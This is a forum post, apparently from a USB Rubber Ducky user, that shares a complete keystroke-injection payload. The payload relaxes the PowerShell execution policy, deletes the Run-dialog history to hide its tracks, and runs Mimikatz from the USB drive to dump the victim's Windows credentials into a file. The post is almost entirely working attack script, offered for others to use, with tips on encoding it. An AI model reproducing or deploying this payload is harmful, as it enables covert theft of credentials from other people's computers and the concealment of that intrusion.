Hey Guys,
Awesome .. ! After 3 hours and so much things learned, it's finally running properly !! :) (Twin duck)
Here the full payload, there's an ESC to close the autorun windows + set-executionpolicy remotesigned to allow running scripts on the system + ALT F4 at the end to close windows.
DELAY 3000
ESC
DELAY 500
GUI r
DELAY 1000
STRING powershell
DELAY 300
ENTER
DELAY 300
STRING set-executionpolicy remotesigned
DELAY 300
ENTER
DELAY 300
STRING o
DELAY 300
ENTER
DELAY 300
STRING exit
DELAY 300
ENTER
DELAY 500
GUI r
DELAY 300
STRING powershell -NoP -NonI -W Hidden -Exec Bypass "Start-Process cmd -A '/t:fe /k mode con lines=40 cols=160® delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs"
DELAY 500
ENTER
DELAY 1000
STRING for /f %d in ('wmic volume get driveletter^, label^|findstr "DUCKY"') do @set DUCKY=%d
DELAY 300
ENTER
DELAY 1000
STRING if exist %DUCKY%\mimi.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module %DUCKY%\mimi.ps1;Invoke-Mimikatz -DumpCreds|Out-File '%DUCKY%\%computername%_creds.txt';"
DELAY 300
ENTER
DELAY 300
ALT F4
Still, it needs 5-10 sec to writte the log file.
Something else : Here : https://ducktoolkit.com/encoder/
We need apparently to wipe out the cache of the browser or smth like that, cause when u encode, seems to encode the first payload you already encoded before .. (Am i clear :p ?) Or it's just a bad move from me.
Cheers guys
